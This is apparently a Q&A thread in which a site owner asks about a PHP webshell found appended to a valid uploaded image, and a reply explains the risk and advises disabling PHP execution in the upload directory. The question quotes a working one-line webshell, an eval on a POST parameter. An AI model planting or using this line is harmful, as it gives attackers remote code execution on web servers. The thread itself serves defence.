Backdoor:PHP/Webshell.O virus detected in an uploaded image file. Should I be worried? How can I prevent it?
I have a site which allows users to upload images. One uploaded file was recently detected by antivirus software (uploads aren't scanned, this was a system wide scan after)
Upon upload, I check the file extension, the MIME type and also use getimagesize() which returns false if it's not a valid image.
However, it does appear to be a valid image. It loads on the website and on Windows. However, at the end of the file it contains the following
<?php @eval($_POST['q']); ?>
Uploaded images are moved to a publicly accessible folder (with directory indexing disabled) and linked from there (the image is displayed on the page using the HTML <img /> element with a direct link to the image file.
Should I be worried about this? My thinking is that it doesn't matter because I'm not including the file within PHP code, and I'm just serving it directly through nginx, but it does make me feel a bit uneasy. Can I even do anything to prevent this, other than configuring ClamAV or similar to scan uploads? I thought utilising getimagesize() was an accepted solution for verifying a file is an image as I've seen it referenced a few times on here, but in this scenario it didn't detect PHP within the file.

There doesn't appear to be a programming question here. Perhaps [security.se] would be a place to ask. Check their help centre before posting

Short answer: yes, you should be worried if you have a specific setup (php and webserver). You can prevent the attack by changing the setup.
Long answer: the php code that you quoted is a simple webshell. It takes the parameter q and executes whatever is given to it in this parameter with the rights of the webserver. Strings like that can be embedded in various ways and in different file formats, and if given to php, the php engine will identify the string as syntactically correct php code and execute it.
The string does not interfere with the actual format of the file, which can be a valid image (or other).
This kind of attack is discussed here:
Block upload of executable images (PHP)
https://www.synacktiv.com/en/publications/persistent-php-payloads-in-pngs-how-to-inject-php-code-in-an-image-and-keep-it-there.html
How to prevent uploaded file from being executed?
Disable PHP execution in one directory
As it's said in the first and second link, it is virtually impossible to filter out these kind of files. However, you can prevent the execution of them in several ways (third and fourth link).
The easiest by far is to exclude php execution in the upload directory, and serve the files directly with the webserver.
